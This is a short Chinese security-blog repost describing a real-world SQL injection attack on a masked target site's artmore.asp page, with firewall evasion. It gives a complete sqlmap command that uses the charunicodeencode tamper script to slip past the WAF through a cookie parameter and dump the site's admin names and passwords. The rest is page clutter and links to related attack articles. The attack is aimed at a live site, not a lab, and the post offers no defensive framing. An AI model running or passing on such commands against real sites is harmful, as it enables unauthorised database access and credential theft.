实战绕过智创防火墙sql注入

admin

102205
文章

87
评论

2021年7月25日06:56:48评论101 views字数 760阅读2分32秒阅读模式

实战绕过智创防火墙sql注入

目标站:http://www.xxxxx.com/
http://www.xxxxx.com/shangmao/artmore.asp?id=48514 存在报错型注入，也存在cookie注入

http://www.xxxxx.com/shangmao/artmore.asp?id=48514 后面加个或者“ ‘判断

拿去sqlmap注入，突破注入用tamper脚本下的charunicodeencode.py ，都是编码绕过的，我就用字符串 unicode 编码

Example:   * Input: SELECT FIELD%20FROM TABLE   * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

ASP
ASP.NET

Tested against:

Microsoft SQL Server 2000
Microsoft SQL Server 2005
MySQL 5.1.56
PostgreSQL 9.0.3

sqlmap.py -u http://www.xxxxx.com/shangmao/artmore.asp

--cookie "id=48514" --level 2 -D hunangyxcb_com_2014 -T applenews_admin_info -C

"adminname,adminpass" --dump --threads=10 --tamper=charunicodeencode.py -v

参数慢慢去领悟，，，，，

实战绕过智创防火墙sql注入

本文始发于微信公众号（飓风网络安全）：实战绕过智创防火墙sql注入

左青龙
微信扫一扫

右白虎
微信扫一扫

实战绕过智创防火墙sql注入

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

hacker10101

主权与信任：网络时代的供应链安全

深入了解DHCP

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

【论文速读】|大语言模型（LLM）智能体可以自主利用1-day漏洞

发表评论

在线咨询

微信